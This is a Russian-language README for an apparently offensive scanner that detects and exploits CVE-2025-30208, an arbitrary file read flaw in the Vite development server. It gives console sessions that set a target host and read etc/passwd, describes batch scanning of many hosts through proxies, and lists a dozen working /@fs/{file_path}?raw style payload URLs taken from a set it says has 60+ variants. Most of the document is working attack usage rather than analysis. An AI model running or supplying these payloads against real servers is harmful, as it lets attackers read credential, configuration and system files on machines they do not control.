
CVE‑2025‑30208 — это уязвимость произвольного чтения файлов средней степени опасности в сервере разработки Vite (популярный инструмент сборки фронтенда).
Продвинутый сканер уязвимости CVE-2025-30208 с функциями корпоративного уровня
Профессиональный инструмент для тестирования на проникновение для обнаружения уязвимости произвольного чтения файлов Vite
🚀 Быстрый старт • 📋 Особенности • 🔧 Использование • 📊 Примеры • 🛡️ Безопасность
Это комплексный сканер уязвимостей, предназначенный для обнаружения и эксплуатации уязвимости CVE-2025-30208 на серверах разработки Vite. Уязвимость позволяет произвольное чтение файлов через конечные точки файловой системы Vite, потенциально раскрывая конфиденциальные файлы конфигурации, исходный код и системную информацию.
Инструмент теперь имеет модульную архитектуру для лучшей поддерживаемости и расширяемости:
CVE-2025-30208.py — Основное приложение сканераpayloads.py — Продвинутые полезные нагрузки для эксплуатации (60+ вариаций)sensitive_files.py — Комплексная база конфиденциальных файлов (200+ файлов)html_template.py — Улучшенный шаблон HTML-отчёта в стиле хакераpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Включить подробный режим для детального вывода
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Нажмите Enter дважды для завершения]
CVE-2025-30208 > scan
# Настройка прокси
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Установка пользовательских заголовков
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Настройка ограничения скорости
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Создать красивый HTML-отчёт
CVE-2025-30208 > pull
# Запустить веб-сервер для просмотра отчёта
CVE-2025-30208 > web
# Запустить веб-сервер на определённом порту
CVE-2025-30208 > web 8081
# Остановить веб-сервер
CVE-2025-30208 > web off
| Команда | Описание | Пример |
|---|---|---|
set <опция> <значение> | Установить параметры конфигурации | set RHOST 192.168.1.100 |
show options | Показать текущие настройки | show options |
edit | Интерактивный редактор опций | edit |
run / exploit | Запустить тест на уязвимость | run |
batch | Пакетное сканирование нескольких целей | batch |
scan | Обнаружить конфиденциальные файлы | scan |
pull | Экспортировать результаты в HTML/JSON | pull |
web [on|off|port] | Веб-сервер для HTML-отчётов | web 8080 |
save | Сохранить конфигурацию сеанса | save |
load | Загрузить конфигурацию сеанса | load |
test | Проверить подключение к цели | test |
validate | Проверить текущую конфигурацию | validate |
verbose | Переключить подробный режим | verbose |
proxy | Настроить параметры прокси | proxy |
headers | Установить пользовательские HTTP-заголовки | headers |
rate | Настроить ограничение скорости | rate |
log | Показать информацию журнала | log |
help / ? | Показать справку | help |
exit / quit | Выйти из инструмента | exit |
| Опция | Описание | По умолчанию | Валидация |
|---|---|---|---|
RHOST | Целевой хост/IP-адрес | - | Валидация имени хоста/IP |
RPORT | Номер порта цели | - | Диапазон портов (1-65535) |
FILEPATH | Путь к файлу для тестирования | etc/passwd | Валидация пути |
PROXY | URL HTTP/HTTPS прокси | - | Валидация формата URL |
VERBOSE | Включить подробный вывод | false | Логическая валидация |
RATE_LIMIT | Задержка между запросами (секунды) | 0.3 | Числовая валидация |
THREADS | Количество потоков для пакетного сканирования | 5 | Целочисленная валидация |
TIMEOUT | Тайм-аут запроса (секунды) | 5 | Целочисленная валидация |
CUSTOM_HEADERS | Пользовательские HTTP-заголовки (JSON) | {} | Валидация формата JSON |
Теперь сканер использует более 60 различных вариаций полезных нагрузок, организованных в payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8